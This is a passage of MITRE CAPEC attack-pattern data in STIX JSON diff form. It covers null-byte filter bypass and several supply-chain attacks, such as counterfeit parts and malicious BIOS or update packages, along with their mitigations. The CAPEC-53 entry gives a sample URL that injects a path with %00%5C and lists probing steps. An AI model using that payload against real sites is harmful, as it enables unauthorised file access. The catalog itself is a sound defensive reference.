valid. Using alternate representation of NULL allows an adversary to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.", + "external_references": [ + { + "external_id": "CAPEC-53", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/53.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Postfix, Null Terminate, and Backslash", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A rather simple injection is possible in a URL:\n http://getAccessHostname/sekbin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&chapter=\n This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) followed by a backslash to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

    2. Techniques
    Try different encodings for null such as \\0 or %00 followed by an encoding for the backslash character.

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) followed by a backslash such that they bypass an input filter and remove data after the null byte(s) in a way that is beneficial to them.

    2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) followed by a backslash at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Null terminators are not properly handled by the filter." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.", + "id": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-53-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b7d2bed-d8be-4a5d-8206-5c90b09eb190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eebe9446-5ca8-4441-ae14-9baa42c6bf1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-530", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/530.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Paul Wagner, Combating Counterfeit Components in the DoD Supply Chain, 2015, Defence Systems Information Analysis Center", + "external_id": "REF-698", + "source_name": "reference_from_CAPEC", + "url": "https://dsiac.org/articles/combating-counterfeit-components-in-the-dod-supply-chain/" + }, + { + "description": "Ujjwal Guin, Ke Huang, Daniel DiMase, John M. Carulli, Jr., Mohammad Tehranipoor, Yiorgos Makris, Counterfeit Integrated Circuits: A Rising Threat in the Global Semiconductor Supply Chain, Proceedings of the IEEE, 2014, IEEE", + "external_id": "REF-703", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856206" + } + ], + "id": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Provide Counterfeit Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target system and sub-components." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that resemble legitimate name-brand components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are various methods to detect if the component is a counterfeit. See section II of [REF-703] for many techniques.", + "id": "course-of-action--270e1858-94a7-4e31-b8dc-ffc71062097e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-530-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfca2257-0ba0-43bb-92c7-3d3cb69eae5a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--270e1858-94a7-4e31-b8dc-ffc71062097e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "external_id": "CAPEC-532", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html" + }, + { + "description": "Firmware Corruption", + "external_id": "T1495", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1495" + }, + { + "description": "Pre-OS Boot:System Firmware", + "external_id": "T1542.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Altered Installed BIOS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b8c6a8f-60bc-44b0-b941-655ac99f1ed2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4dba22e9-c6a9-41d4-90dc-e0f901ba07b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558fc16d-3a30-4de8-a6a3-715da1167d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87ea2ec-a2a8-4154-9e21-c6527e611602", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5dc5f9ce-0406-4e0d-a272-ff33e485b751", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aadd9ce-2c81-4af1-8711-9aec554535b9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "spec_version": "2.1", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.", + "external_references": [ + { + "external_id": "CAPEC-533", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/533.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Sean Endicott, Fake Microsoft update used in malicious email attack campaign, 2021--07, Microsoft News", + "external_id": "REF-710", + "source_name": "reference_from_CAPEC", + "url": "https://www.msn.com/en-us/news/technology/fake-microsoft-update-used-in-malicious-email-attack-campaign/ar-AALTcVs" + } + ], + "id": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Manual Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An email campaign was initiated, targetting victims of a ransomware attack. The email claimed to be a patch to address the ransomware attack, but was instead an attachment that caused the Cobalt Strike tools to be installed, which enabled further attacks." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the download and update installation processes.", + "Advanced knowledge about the deployed system and its various software subcomponents and processes." + ], + "x_capec_skills_required": { + "High": "Able to develop malicious code that can be used on the victim's system while maintaining normal functionality." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2561ff45-4348-494c-9576-fa1268c134d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "spec_version": "2.1", + "target_ref": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.", + "external_references": [ + { + "external_id": "CAPEC-534", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/534.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Omer Shwartz, Amir Cohen, Asaf Shabtai, Yossi Oren, Shattered Trust: When Replacement Smartphone Components Attack, 11th USENIX Workshop on Offensive Technologies, 2017, USENIX", + "external_id": "REF-711", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/system/files/conference/woot17/woot17-paper-shwartz.pdf" + } + ], + "id": "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Hardware Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366" + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.", + "external_references": [ + { + "external_id": "CAPEC-535", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/535.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Gray Market Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase only from authorized resellers.", + "id": "course-of-action--274b7982-b465-45d9-b44b-d6c8f9b6d432", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1f86bfc-be12-4ad3-92bf-99b0d177e3cc", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--274b7982-b465-45d9-b44b-d6c8f9b6d432", + "spec_version": "2.1", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate serial numbers from multiple sources", + "id": "course-of-action--9130946b-256a-4f1f-ac81-69e0a065710d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--41d1eae2-202b-4705-b213-36f908117a81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9130946b-256a-4f1f-ac81-69e0a065710d", + "spec_version": "2.1", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-536", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/536.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": 